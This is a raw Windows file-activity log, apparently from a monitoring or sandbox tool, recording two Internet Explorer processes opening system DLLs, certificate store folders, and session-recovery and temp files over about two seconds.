11/3/2020 - 11:45:46.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\DNSAPI.dll
11/3/2020 - 11:45:46.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:46.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:47.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wininet.dll
11/3/2020 - 11:45:47.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wininet.dll
11/3/2020 - 11:45:47.231Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\dhcpcsvc6.DLL
11/3/2020 - 11:45:47.231Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dll
11/3/2020 - 11:45:47.231Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:47.231Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dll
11/3/2020 - 11:45:47.231Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:47.278Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\dhcpcsvc.DLL
11/3/2020 - 11:45:47.278Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc.dll
11/3/2020 - 11:45:47.278Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dhcpcsvc.dll
11/3/2020 - 11:45:47.778Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:47.778Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:47.778Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.778Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\rasadhlp.dll
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rasadhlp.dll
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rasadhlp.dll
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
11/3/2020 - 11:45:47.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.840Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:47.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\SXS.DLL
11/3/2020 - 11:45:47.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sxs.dll
11/3/2020 - 11:45:47.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sxs.dll
11/3/2020 - 11:45:47.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.887Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.903Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:47.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:47.918Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:48.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEUI.dll
11/3/2020 - 11:45:48.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieui.dll
11/3/2020 - 11:45:48.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieui.dll
11/3/2020 - 11:45:48.122Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\MLANG.dll
11/3/2020 - 11:45:48.122Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mlang.dll
11/3/2020 - 11:45:48.122Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mlang.dll
11/3/2020 - 11:45:48.122Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.122Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.122Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.122Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.122Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.122Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\
11/3/2020 - 11:45:48.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Caches
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Caches
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000000.db
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\desktop.ini
11/3/2020 - 11:45:48.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\desktop.ini
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:48.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:48.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites\desktop.ini
11/3/2020 - 11:45:48.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites\desktop.ini
11/3/2020 - 11:45:48.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\desktop.ini
11/3/2020 - 11:45:48.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\desktop.ini
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore
11/3/2020 - 11:45:48.153Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt
11/3/2020 - 11:45:48.153Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt
11/3/2020 - 11:45:48.153Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.153Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt\imagestore.datimagestore.dat
11/3/2020 - 11:45:48.168Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\iconcache
11/3/2020 - 11:45:48.168Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\url.dll
11/3/2020 - 11:45:48.168Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\url.dll
11/3/2020 - 11:45:48.168Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\url.dll
11/3/2020 - 11:45:48.168Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-core-winrt-string-l1-1-0.dll
11/3/2020 - 11:45:48.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ole32.dll
11/3/2020 - 11:45:48.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ole32.dll
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
